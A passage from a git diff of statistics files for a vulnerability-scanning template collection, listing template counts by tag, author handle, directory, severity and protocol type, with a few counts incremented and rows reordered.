czarnecki","count":1},{"name":"regala_","count":1},{"name":"mhdsamx","count":1},{"name":"@dwisiswant0","count":1},{"name":"noamrathaus","count":1},{"name":"becivells","count":1},{"name":"bolli95","count":1},{"name":"yavolo","count":1},{"name":"tim_koopmans","count":1},{"name":"wabafet","count":1},{"name":"d0rkerdevil","count":1},{"name":"exploitation","count":1},{"name":"_harleo","count":1},{"name":"0xrod","count":1},{"name":"zhenwarx","count":1},{"name":"bjhulst","count":1},{"name":"hanlaomo","count":1},{"name":"sullo","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"shreyapohekar","count":1},{"name":"co0nan","count":1},{"name":"abison_binoy","count":1},{"name":"remonsec","count":1},{"name":"raesene","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"c3l3si4n","count":1},{"name":"hakluke","count":1},{"name":"willd96","count":1},{"name":"th3.d1p4k","count":1},{"name":"luci","count":1},{"name":"s1r1u5_","count":1},{"name":"elmahdi","count":1},{"name":"rodnt","count":1},{"name":"alifathi-h1","count":1},{"name":"fopina","count":1},{"name":"defr0ggy","count":1},{"name":"dudez","count":1},{"name":"qlkwej","count":1},{"name":"nkxxkn","count":1},{"name":"akash.c","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"soyelmago","count":1},{"name":"0xtavian","count":1},{"name":"thevillagehacker","count":1},{"name":"vsh00t","count":1},{"name":"rtcms","count":1},{"name":"zandros0","count":1},{"name":"_c0wb0y_","count":1},{"name":"0h1in9e","count":1},{"name":"juicypotato1","count":1},{"name":"smaranchand","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"ringo","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"apt-mirror","count":1},{"name":"kareemse1im","count":1},{"name":"vzamanillo","count":1},{"name":"andirrahmani1","count":1},{"name":"b4uh0lz","count":1},{"name":"ahmed sherif","count":1},{"name":"geraldino2","count":1},{"name":"yashanand155","count":1},{"name":"micha3lb3n","count":1},{"name":"alex","count":1},{"name":"ohlinge","count":1},{"name":"iampritam","count":1},{"name":"_darrenmartyn","count":1},{"name":"alperenkesk","count":1},{"name":"taielab","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"ldionmarcil","count":1},{"name":"sickwell","count":1},{"name":"idealphase","count":1},{"name":"shelld3v","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"mah3sec_","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"johnk3r","count":1},{"name":"luskabol","count":1},{"name":"mubassirpatel","count":1},{"name":"_generic_human_","count":1},{"name":"ajaysenr","count":1},{"name":"whynotke","count":1},{"name":"mohammedsaneem","count":1},{"name":"alph4byt3","count":1},{"name":"knassar702","count":1},{"name":"affix","count":1},{"name":"arcc","count":1},{"name":"notsoevilweasel","count":1},{"name":"undefl0w","count":1},{"name":"j33n1k4","count":1},{"name":"blckraven","count":1},{"name":"flag007","count":1},{"name":"0ut0fb4nd","count":1},{"name":"koti2","count":1},{"name":"jeya seelan","count":1},{"name":"cookiehanhoan","count":1},{"name":"omarkurt","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"furkansenan","count":1},{"name":"manuelbua","count":1},{"name":"schniggie","count":1},{"name":"ilovebinbash","count":1},{"name":"johnjhacking","count":1},{"name":"kabirsuda","count":1},{"name":"sshell","count":1},{"name":"pudsec","count":1},{"name":"shifacyclewla","count":1},{"name":"berkdusunur","count":1},{"name":"bad5ect0r","count":1},{"name":"divya_mudgal","count":1},{"name":"ooooooo_q","count":1},{"name":"bing0o","count":1},{"name":"akshansh","count":1},{"name":"kurohost","count":1},{"name":"daviey","count":1},{"name":"absshax","count":1},{"name":"rojanrijal","count":1},{"name":"ipanda","count":1},{"name":"sy3omda","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"52971","count":1},{"name":"dogasantos","count":1},{"name":"deena","count":1},{"name":"fmunozs","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"thezakman","count":1},{"name":"r3naissance","count":1},{"name":"pdp","count":1},{"name":"chron0x","count":1},{"name":"toufik airane","count":1},{"name":"w4cky_","count":1},{"name":"sicksec","count":1},{"name":"its0x08","count":1},{"name":"gal nagli","count":1},{"name":"naglinagli","count":1},{"name":"tirtha_mandal","count":1},{"name":"gboddin","count":1},{"name":"nytr0gen","count":1},{"name":"fabaff","count":1}],"directory":[{"name":"cves","count":470},{"name":"vulnerabilities","count":233},{"name":"exposed-panels","count":202},{"name":"exposures","count":150},{"name":"technologies","count":129},{"name":"misconfiguration","count":114},{"name":"takeovers","count":70},{"name":"default-logins","count":44},{"name":"file","count":42},{"name":"workflows","count":33},{"name":"miscellaneous","count":27},{"name":"network","count":25},{"name":"iot","count":18},{"name":"dns","count":10},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":453},{"name":"high","count":395},{"name":"medium","count":313},{"name":"critical","count":187},{"name":"low","count":150}],"types":[{"name":"http","count":1409},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 2127d6d969..cc675566c5 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,15 +1,15 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 464 | dhiyaneshdk | 202 | cves | 470 | info | 453 | http | 1408 | -| panel | 201 | pdteam | 184 | vulnerabilities | 232 | high | 395 | file | 42 | +| cve | 464 | dhiyaneshdk | 202 | cves | 470 | info | 453 | http | 1409 | +| panel | 201 | pdteam | 184 | vulnerabilities | 233 | high | 395 | file | 42 | | xss | 168 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 | -| wordpress | 165 | dwisiswant0 | 113 | exposures | 150 | critical | 186 | dns | 10 | -| rce | 161 | geeknik | 88 | technologies | 129 | low | 150 | | | +| wordpress | 165 | dwisiswant0 | 113 | exposures | 150 | critical | 187 | dns | 10 | +| rce | 162 | geeknik | 88 | technologies | 129 | low | 150 | | | | exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | | | cve2020 | 135 | madrobot | 59 | takeovers | 70 | | | | | | lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | | | wp-plugin | 110 | gaurang | 42 | file | 42 | | | | | -| cve2019 | 82 | gy741 | 35 | workflows | 33 | | | | | +| cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | | | config | 81 | ice3man | 26 | miscellaneous | 27 | | | | | | tech | 72 | pussycat0x | 25 | network | 25 | | | | | | takeover | 71 | 0x_akoko | 20 | iot | 18 | | | | | @@ -17,585 +17,586 @@ | token | 63 | sheikhrishad | 15 | fuzzing | 10 | | | | | | cve2018 | 62 | milo2012 | 13 | cnvd | 9 | | | | | | apache | 60 | techbrunchfr | 13 | headless | 5 | | | | | -| default-login | 45 | suman_kar | 12 | .pre-commit-config.yaml | 1 | | | | | -| cve2017 | 43 | pr3r00t | 12 | | | | | | | +| default-login | 45 | pr3r00t | 12 | .pre-commit-config.yaml | 1 | | | | | +| cve2017 | 43 | suman_kar | 12 | | | | | | | | file | 42 | cyllective | 11 | | | | | | | | unauth | 39 | random_robbie | 10 | | | | | | | | iot | 33 | righettod | 9 | | | | | | | -| network | 32 | iamthefrogy | 8 | | | | | | | -| sqli | 29 | hackergautam | 8 | | | | | | | -| oracle | 29 | wdahlenb | 8 | | | | | | | +| network | 32 | wdahlenb | 8 | | | | | | | +| oracle | 29 | iamthefrogy | 8 | | | | | | | +| sqli | 29 | aashiq | 8 | | | | | | | | workflow | 28 | nadino | 8 | | | | | | | -| misc | 27 | aashiq | 8 | | | | | | | -| atlassian | 26 | randomstr1ng | 7 | | | | | | | +| misc | 27 | hackergautam | 8 | | | | | | | +| atlassian | 26 | dr_set | 7 | | | | | | | | jira | 25 | oppsec | 7 | | | | | | | -| ssrf | 25 | dr_set | 7 | | | | | | | -| oob | 24 | techryptic (@tech) | 7 | | | | | | | -| logs | 24 | r3dg33k | 7 | | | | | | | -| disclosure | 24 | that_juan_ | 7 | | | | | | | -| redirect | 20 | 0x240x23elu | 7 | | | | | | | -| aem | 18 | melbadry9 | 7 | | | | | | | -| listing | 15 | emadshanab | 7 | | | | | | | -| cisco | 15 | harshbothra_ | 7 | | | | | | | +| oob | 25 | randomstr1ng | 7 | | | | | | | +| ssrf | 25 | techryptic (@tech) | 7 | | | | | | | +| logs | 24 | harshbothra_ | 7 | | | | | | | +| disclosure | 24 | melbadry9 | 7 | | | | | | | +| redirect | 20 | emadshanab | 7 | | | | | | | +| aem | 18 | r3dg33k | 7 | | | | | | | +| cisco | 15 | 0x240x23elu | 7 | | | | | | | +| listing | 15 | that_juan_ | 7 | | | | | | | | cve2016 | 14 | philippedelteil | 6 | | | | | | | | sap | 14 | __fazal | 6 | | | | | | | -| misconfig | 13 | puzzlepeaches | 5 | | | | | | | -| fuzz | 13 | caspergn | 5 | | | | | | | -| cve2015 | 13 | panch0r3d | 5 | | | | | | | | struts | 13 | pentest_swissky | 5 | | | | | | | +| cve2015 | 13 | puzzlepeaches | 5 | | | | | | | +| fuzz | 13 | yanyun | 5 | | | | | | | | debug | 13 | ganofins | 5 | | | | | | | -| android | 12 | yanyun | 5 | | | | | | | -| weblogic | 12 | github.com/its0x08 | 4 | | | | | | | -| auth-bypass | 11 | nodauf | 4 | | | | | | | -| springboot | 11 | e_schultze_ | 4 | | | | | | | +| misconfig | 13 | caspergn | 5 | | | | | | | +| android | 12 | panch0r3d | 5 | | | | | | | +| weblogic | 12 | xelkomy | 4 | | | | | | | +| dns | 11 | github.com/its0x08 | 4 | | | | | | | +| springboot | 11 | iamnoooob | 4 | | | | | | | +| auth-bypass | 11 | rootxharsh | 4 | | | | | | | | zoho | 11 | meme-lord | 4 | | | | | | | -| dns | 11 | iamnoooob | 4 | | | | | | | -| cve2011 | 10 | rootxharsh | 4 | | | | | | | -| devops | 10 | xelkomy | 4 | | | | | | | -| jenkins | 9 | binaryfigments | 3 | | | | | | | -| dlink | 9 | fyoorer | 3 | | | | | | | -| cve2012 | 9 | f1tz | 3 | | | | | | | -| magento | 9 | 0w4ys | 3 | | | | | | | -| adobe | 8 | impramodsargar | 3 | | | | | | | -| ftp | 8 | shine | 3 | | | | | | | -| php | 8 | z3bd | 3 | | | | | | | -| airflow | 8 | thomas_from_offensity | 3 | | | | | | | -| aws | 8 | kophjager007 | 3 | | | | | | | -| cve2013 | 8 | joanbono | 3 | | | | | | | -| gitlab | 8 | yash anand @yashanand155 | 3 | | | | | | | -| cnvd | 8 | tess | 3 | | | | | | | -| cve2014 | 7 | hetroublemakr | 2 | | | | | | | -| joomla | 7 | mavericknerd | 2 | | | | | | | -| vmware | 7 | ree4pwn | 2 | | | | | | | -| scada | 7 | x1m_martijn | 2 | | | | | | | -| xxe | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| cms | 6 | incogbyte | 2 | | | | | | | -| backup | 6 | vavkamil | 2 | | | | | | | -| rails | 6 | gevakun | 2 | | | | | | | -| google | 6 | manas_harsh | 2 | | | | | | | -| api | 6 | afaq | 2 | | | | | | | -| nginx | 6 | random-robbie | 2 | | | | | | | +| cve2011 | 10 | nodauf | 4 | | | | | | | +| devops | 10 | e_schultze_ | 4 | | | | | | | +| magento | 9 | f1tz | 3 | | | | | | | +| cve2012 | 9 | thomas_from_offensity | 3 | | | | | | | +| jenkins | 9 | 0w4ys | 3 | | | | | | | +| dlink | 9 | impramodsargar | 3 | | | | | | | +| php | 8 | fyoorer | 3 | | | | | | | +| adobe | 8 | tess | 3 | | | | | | | +| aws | 8 | joanbono | 3 | | | | | | | +| cnvd | 8 | kophjager007 | 3 | | | | | | | +| ftp | 8 | z3bd | 3 | | | | | | | +| airflow | 8 | shine | 3 | | | | | | | +| gitlab | 8 | binaryfigments | 3 | | | | | | | +| cve2013 | 8 | yash anand @yashanand155 | 3 | | | | | | | +| scada | 7 | 0xelkomy | 2 | | | | | | | +| joomla | 7 | bsysop | 2 | | | | | | | +| cve2014 | 7 | zomsop82 | 2 | | | | | | | +| vmware | 7 | foulenzer | 2 | | | | | | | | citrix | 6 | kiblyn11 | 2 | | | | | | | -| rconfig | 6 | moritz nentwig | 2 | | | | | | | -| dell | 5 | amsda | 2 | | | | | | | -| login | 5 | lu4nx | 2 | | | | | | | -| phpmyadmin | 5 | bp0lr | 2 | | | | | | | -| iis | 5 | unstabl3 | 2 | | | | | | | -| ssti | 5 | lotusdll | 2 | | | | | | | -| confluence | 5 | dheerajmadhukar | 2 | | | | | | | -| jetty | 5 | udit_thakkur | 2 | | | | | | | -| headless | 5 | 0xcrypto | 2 | | | | | | | -| java | 5 | 0xrudra | 2 | | | | | | | -| solr | 5 | emenalf | 2 | | | | | | | -| lucee | 5 | elsfa7110 | 2 | | | | | | | -| circarlife | 5 | davidmckennirey | 2 | | | | | | | -| laravel | 5 | shifacyclewala | 2 | | | | | | | -| ruijie | 5 | swissky | 2 | | | | | | | -| drupal | 5 | jarijaas | 2 | | | | | | | -| jolokia | 4 | bsysop | 2 | | | | | | | -| artifactory | 4 | zomsop82 | 2 | | | | | | | -| hongdian | 4 | pxmme1337 | 2 | | | | | | | -| thinkcmf | 4 | 0xsapra | 2 | | | | | | | -| ibm | 4 | 0xelkomy | 2 | | | | | | | -| netgear | 4 | 0xprial | 2 | | | | | | | -| asp | 4 | joeldeleep | 2 | | | | | | | -| moodle | 4 | randomrobbie | 2 | | | | | | | -| vpn | 4 | foulenzer | 2 | | | | | | | -| traversal | 4 | ehsahil | 2 | | | | | | | -| nodejs | 4 | idealphase | 1 | | | | | | | -| tomcat | 4 | ajaysenr | 1 | | | | | | | -| webserver | 4 | bad5ect0r | 1 | | | | | | | -| elastic | 4 | chron0x | 1 | | | | | | | -| thinkphp | 4 | mhdsamx | 1 | | | | | | | -| samsung | 4 | alperenkesk | 1 | | | | | | | -| cve2009 | 4 | divya_mudgal | 1 | | | | | | | -| magmi | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| solarwinds | 4 | 0xrod | 1 | | | | | | | -| fileupload | 4 | remonsec | 1 | | | | | | | -| django | 4 | j3ssie/geraldino2 | 1 | | | | | | | -| docker | 4 | alifathi-h1 | 1 | | | | | | | -| router | 4 | omarkurt | 1 | | | | | | | -| mongodb | 3 | 52971 | 1 | | | | | | | -| backups | 3 | bolli95 | 1 | | | | | | | -| ssh | 3 | dogasantos | 1 | | | | | | | -| caucho | 3 | tirtha_mandal | 1 | | | | | | | -| windows | 3 | @dwisiswant0 | 1 | | | | | | | -| r-seenet | 3 | pdp | 1 | | | | | | | -| slack | 3 | notsoevilweasel | 1 | | | | | | | -| fanruan | 3 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| nacos | 3 | w4cky_ | 1 | | | | | | | -| ebs | 3 | sushant kamble | 1 | | | | | | | +| rconfig | 6 | 0xprial | 2 | | | | | | | +| google | 6 | pxmme1337 | 2 | | | | | | | +| cms | 6 | mavericknerd | 2 | | | | | | | +| rails | 6 | 0xrudra | 2 | | | | | | | +| nginx | 6 | swissky | 2 | | | | | | | +| api | 6 | ehsahil | 2 | | | | | | | +| backup | 6 | unstabl3 | 2 | | | | | | | +| xxe | 6 | gevakun | 2 | | | | | | | +| java | 5 | bp0lr | 2 | | | | | | | +| ssti | 5 | joeldeleep | 2 | | | | | | | +| ruijie | 5 | moritz nentwig | 2 | | | | | | | +| laravel | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| circarlife | 5 | vavkamil | 2 | | | | | | | +| dell | 5 | dheerajmadhukar | 2 | | | | | | | +| phpmyadmin | 5 | udit_thakkur | 2 | | | | | | | +| lucee | 5 | jarijaas | 2 | | | | | | | +| login | 5 | afaq | 2 | | | | | | | +| jetty | 5 | davidmckennirey | 2 | | | | | | | +| solr | 5 | incogbyte | 2 | | | | | | | +| iis | 5 | shifacyclewala | 2 | | | | | | | +| confluence | 5 | lotusdll | 2 | | | | | | | +| drupal | 5 | lu4nx | 2 | | | | | | | +| headless | 5 | randomrobbie | 2 | | | | | | | +| vpn | 4 | elsfa7110 | 2 | | | | | | | +| traversal | 4 | random-robbie | 2 | | | | | | | +| elastic | 4 | x1m_martijn | 2 | | | | | | | +| artifactory | 4 | 0xcrypto | 2 | | | | | | | +| router | 4 | hetroublemakr | 2 | | | | | | | +| hongdian | 4 | amsda | 2 | | | | | | | +| nodejs | 4 | ree4pwn | 2 | | | | | | | +| docker | 4 | 0xsapra | 2 | | | | | | | +| django | 4 | emenalf | 2 | | | | | | | +| cve2009 | 4 | manas_harsh | 2 | | | | | | | +| fileupload | 4 | johnk3r | 1 | | | | | | | +| netgear | 4 | remonsec | 1 | | | | | | | +| asp | 4 | blckraven | 1 | | | | | | | +| jolokia | 4 | s1r1u5_ | 1 | | | | | | | +| moodle | 4 | tim_koopmans | 1 | | | | | | | +| samsung | 4 | @dwisiswant0 | 1 | | | | | | | +| thinkphp | 4 | thevillagehacker | 1 | | | | | | | +| webserver | 4 | wabafet | 1 | | | | | | | +| tomcat | 4 | sickwell | 1 | | | | | | | +| solarwinds | 4 | gboddin | 1 | | | | | | | +| ibm | 4 | w4cky_ | 1 | | | | | | | +| magmi | 4 | mohammedsaneem | 1 | | | | | | | +| thinkcmf | 4 | regala_ | 1 | | | | | | | +| crlf | 3 | sushant kamble | 1 | | | | | | | | | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| openssh | 3 | ahmed sherif | 1 | | | | | | | -| bypass | 3 | rtcms | 1 | | | | | | | -| amazon | 3 | aceseven (digisec360) | 1 | | | | | | | -| lfr | 3 | jeya seelan | 1 | | | | | | | -| log | 3 | becivells | 1 | | | | | | | -| microstrategy | 3 | johnk3r | 1 | | | | | | | -| springcloud | 3 | streetofhackerr007 | 1 | | | | | | | -| fpd | 3 | mubassirpatel | 1 | | | | | | | -| terramaster | 3 | affix | 1 | | | | | | | -| deserialization | 3 | dudez | 1 | | | | | | | -| resin | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| oa | 3 | rojanrijal | 1 | | | | | | | -| grafana | 3 | hanlaomo | 1 | | | | | | | -| kafka | 3 | alph4byt3 | 1 | | | | | | | -| git | 3 | mohammedsaneem | 1 | | | | | | | -| dedecms | 3 | andirrahmani1 | 1 | | | | | | | -| crlf | 3 | ilovebinbash | 1 | | | | | | | -| ofbiz | 3 | whynotke | 1 | | | | | | | -| kubernetes | 3 | alex | 1 | | | | | | | -| nosqli | 3 | c3l3si4n | 1 | | | | | | | -| printer | 3 | taielab | 1 | | | | | | | -| vbulletin | 3 | cookiehanhoan | 1 | | | | | | | -| icewarp | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| nexus | 2 | abison_binoy | 1 | | | | | | | -| service | 2 | smaranchand | 1 | | | | | | | -| bigip | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| mail | 2 | akash.c | 1 | | | | | | | -| dos | 2 | juicypotato1 | 1 | | | | | | | -| smtp | 2 | luci | 1 | | | | | | | -| leak | 2 | nytr0gen | 1 | | | | | | | -| hashicorp | 2 | vsh00t | 1 | | | | | | | -| frp | 2 | j33n1k4 | 1 | | | | | | | -| mida | 2 | defr0ggy | 1 | | | | | | | -| splunk | 2 | bing0o | 1 | | | | | | | -| httpd | 2 | thezakman | 1 | | | | | | | -| kibana | 2 | deena | 1 | | | | | | | -| zhiyuan | 2 | sy3omda | 1 | | | | | | | -| saltstack | 2 | knassar702 | 1 | | | | | | | -| rockethchat | 2 | noamrathaus | 1 | | | | | | | -| maian | 2 | _harleo | 1 | | | | | | | -| globalprotect | 2 | sullo | 1 | | | | | | | -| kentico | 2 | zandros0 | 1 | | | | | | | -| exposures | 2 | apt-mirror | 1 | | | | | | | -| cve2008 | 2 | dawid czarnecki | 1 | | | | | | | -| intrusive | 2 | manuelbua | 1 | | | | | | | -| hp | 2 | naglinagli | 1 | | | | | | | -| rstudio | 2 | ooooooo_q | 1 | | | | | | | -| flir | 2 | fopina | 1 | | | | | | | -| plesk | 2 | regala_ | 1 | | | | | | | -| rockmongo | 2 | sicksec | 1 | | | | | | | -| yapi | 2 | pudsec | 1 | | | | | | | -| injection | 2 | wabafet | 1 | | | | | | | -| activemq | 2 | ratnadip gajbhiye | 1 | | | | | | | -| sonicwall | 2 | soyelmago | 1 | | | | | | | -| sonarqube | 2 | ipanda | 1 | | | | | | | -| jboss | 2 | patralos | 1 | | | | | | | -| fortios | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| openfire | 2 | 0h1in9e | 1 | | | | | | | -| pega | 2 | thevillagehacker | 1 | | | | | | | -| idrac | 2 | yashanand155 | 1 | | | | | | | -| nagios | 2 | gboddin | 1 | | | | | | | -| nextjs | 2 | flag007 | 1 | | | | | | | -| ecology | 2 | schniggie | 1 | | | | | | | -| cache | 2 | sickwell | 1 | | | | | | | -| chamilo | 2 | mah3sec_ | 1 | | | | | | | -| paloalto | 2 | fabaff | 1 | | | | | | | -| hjtcloud | 2 | sshell | 1 | | | | | | | -| strapi | 2 | @github.com/defr0ggy | 1 | | | | | | | -| ucmdb | 2 | yashgoti | 1 | | | | | | | -| bitrix | 2 | s1r1u5_ | 1 | | | | | | | -| xxljob | 2 | _c0wb0y_ | 1 | | | | | | | -| sharepoint | 2 | absshax | 1 | | | | | | | -| voipmonitor | 2 | kareemse1im | 1 | | | | | | | -| showdoc | 2 | micha3lb3n | 1 | | | | | | | -| natshell | 2 | shifacyclewla | 1 | | | | | | | -| glassfish | 2 | toufik airane | 1 | | | | | | | -| shellshock | 2 | ringo | 1 | | | | | | | -| keycloak | 2 | co0nan | 1 | | | | | | | -| oauth | 2 | kabirsuda | 1 | | | | | | | -| waf | 2 | hakluke | 1 | | | | | | | -| huawei | 2 | kurohost | 1 | | | | | | | -| wordfence | 2 | exploitation | 1 | | | | | | | -| microsoft | 2 | yavolo | 1 | | | | | | | -| odoo | 2 | nkxxkn | 1 | | | | | | | -| hpe | 2 | its0x08 | 1 | | | | | | | -| couchdb | 2 | berkdusunur | 1 | | | | | | | -| webcam | 2 | ldionmarcil | 1 | | | | | | | -| coldfusion | 2 | rodnt | 1 | | | | | | | -| spark | 2 | willd96 | 1 | | | | | | | -| trixbox | 2 | th3.d1p4k | 1 | | | | | | | -| seeyon | 2 | shreyapohekar | 1 | | | | | | | -| vrealize | 2 | undefl0w | 1 | | | | | | | -| jellyfin | 2 | luskabol | 1 | | | | | | | -| openam | 2 | elmahdi | 1 | | | | | | | -| emerge | 2 | gal nagli | 1 | | | | | | | -| smb | 2 | d0rkerdevil | 1 | | | | | | | -| zabbix | 2 | bjhulst | 1 | | | | | | | -| telerik | 2 | b4uh0lz | 1 | | | | | | | -| proxy | 2 | vzamanillo | 1 | | | | | | | -| prometheus | 2 | ohlinge | 1 | | | | | | | -| extractor | 1 | tim_koopmans | 1 | | | | | | | -| emby | 1 | arcc | 1 | | | | | | | -| razor | 1 | furkansenan | 1 | | | | | | | -| servicedesk | 1 | akshansh | 1 | | | | | | | -| discourse | 1 | qlkwej | 1 | | | | | | | -| axis | 1 | koti2 | 1 | | | | | | | -| phpunit | 1 | kba@sogeti_esec | 1 | | | | | | | -| triconsole | 1 | _generic_human_ | 1 | | | | | | | -| fuelcms | 1 | shelld3v | 1 | | | | | | | -| sco | 1 | fmunozs | 1 | | | | | | | -| zmanda | 1 | geraldino2 | 1 | | | | | | | -| anchorcms | 1 | r3naissance | 1 | | | | | | | -| drone | 1 | aaron_costello | 1 | | | | | | | +| kubernetes | 3 | toufik airane | 1 | | | | | | | +| ofbiz | 3 | raesene | 1 | | | | | | | +| ebs | 3 | soyelmago | 1 | | | | | | | +| caucho | 3 | sullo | 1 | | | | | | | +| dedecms | 3 | qlkwej | 1 | | | | | | | +| terramaster | 3 | @github.com/defr0ggy | 1 | | | | | | | +| r-seenet | 3 | streetofhackerr007 | 1 | | | | | | | +| bypass | 3 | deena | 1 | | | | | | | +| resin | 3 | micha3lb3n | 1 | | | | | | | +| microstrategy | 3 | dawid czarnecki | 1 | | | | | | | +| git | 3 | pudsec | 1 | | | | | | | +| printer | 3 | yashgoti | 1 | | | | | | | +| windows | 3 | 0ut0fb4nd | 1 | | | | | | | +| ssh | 3 | absshax | 1 | | | | | | | +| backups | 3 | akshansh | 1 | | | | | | | +| log | 3 | 52971 | 1 | | | | | | | +| fpd | 3 | apt-mirror | 1 | | | | | | | +| nosqli | 3 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| postmessage | 1 | iampritam | 1 | | | | | | | -| aspnuke | 1 | _darrenmartyn | 1 | | | | | | | -| blue-ocean | 1 | 0ut0fb4nd | 1 | | | | | | | -| rdp | 1 | 0xtavian | 1 | | | | | | | -| zeroshell | 1 | blckraven | 1 | | | | | | | -| tika | 1 | daviey | 1 | | | | | | | -| sqlite | 1 | raesene | 1 | | | | | | | -| mailchimp | 1 | zhenwarx | 1 | | | | | | | -| moinmoin | 1 | johnjhacking | 1 | | | | | | | -| nette | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| akamai | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| horde | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | +| springcloud | 3 | nkxxkn | 1 | | | | | | | +| slack | 3 | _harleo | 1 | | | | | | | +| nacos | 3 | smaranchand | 1 | | | | | | | +| deserialization | 3 | 0xtavian | 1 | | | | | | | +| fanruan | 3 | andirrahmani1 | 1 | | | | | | | +| oa | 3 | undefl0w | 1 | | | | | | | +| grafana | 3 | furkansenan | 1 | | | | | | | +| amazon | 3 | iampritam | 1 | | | | | | | +| vbulletin | 3 | _darrenmartyn | 1 | | | | | | | +| kafka | 3 | fmunozs | 1 | | | | | | | +| lfr | 3 | fabaff | 1 | | | | | | | +| mongodb | 3 | d0rkerdevil | 1 | | | | | | | +| openssh | 3 | co0nan | 1 | | | | | | | +| exposures | 2 | mah3sec_ | 1 | | | | | | | +| cache | 2 | bjhulst | 1 | | | | | | | +| waf | 2 | ahmed sherif | 1 | | | | | | | +| fortios | 2 | taielab | 1 | | | | | | | +| shellshock | 2 | th3.d1p4k | 1 | | | | | | | +| activemq | 2 | zhenwarx | 1 | | | | | | | +| nagios | 2 | hanlaomo | 1 | | | | | | | +| openfire | 2 | dudez | 1 | | | | | | | +| trixbox | 2 | naglinagli | 1 | | | | | | | +| spark | 2 | schniggie | 1 | | | | | | | +| strapi | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| webcam | 2 | ajaysenr | 1 | | | | | | | +| couchdb | 2 | johnjhacking | 1 | | | | | | | +| mida | 2 | arcc | 1 | | | | | | | +| hjtcloud | 2 | geraldino2 | 1 | | | | | | | +| emerge | 2 | sy3omda | 1 | | | | | | | +| proxy | 2 | manuelbua | 1 | | | | | | | +| idrac | 2 | exploitation | 1 | | | | | | | +| oauth | 2 | juicypotato1 | 1 | | | | | | | +| paloalto | 2 | b4uh0lz | 1 | | | | | | | +| splunk | 2 | ipanda | 1 | | | | | | | +| intrusive | 2 | bad5ect0r | 1 | | | | | | | +| smb | 2 | ooooooo_q | 1 | | | | | | | +| rstudio | 2 | alex | 1 | | | | | | | +| sharepoint | 2 | willd96 | 1 | | | | | | | +| nextjs | 2 | alifathi-h1 | 1 | | | | | | | +| vrealize | 2 | bolli95 | 1 | | | | | | | +| telerik | 2 | rojanrijal | 1 | | | | | | | +| nexus | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| openam | 2 | hakluke | 1 | | | | | | | +| coldfusion | 2 | shelld3v | 1 | | | | | | | +| plesk | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| odoo | 2 | gal nagli | 1 | | | | | | | +| jellyfin | 2 | knassar702 | 1 | | | | | | | +| injection | 2 | divya_mudgal | 1 | | | | | | | +| keycloak | 2 | sicksec | 1 | | | | | | | +| smtp | 2 | cookiehanhoan | 1 | | | | | | | +| leak | 2 | vsh00t | 1 | | | | | | | +| sonarqube | 2 | patralos | 1 | | | | | | | +| bitrix | 2 | daviey | 1 | | | | | | | +| mail | 2 | alperenkesk | 1 | | | | | | | +| hpe | 2 | pdp | 1 | | | | | | | +| hp | 2 | 0h1in9e | 1 | | | | | | | +| pega | 2 | fopina | 1 | | | | | | | +| rockmongo | 2 | aceseven (digisec360) | 1 | | | | | | | +| hashicorp | 2 | ohlinge | 1 | | | | | | | +| globalprotect | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| dos | 2 | defr0ggy | 1 | | | | | | | +| flir | 2 | ivo palazzolo (@palaziv) | 1 | | 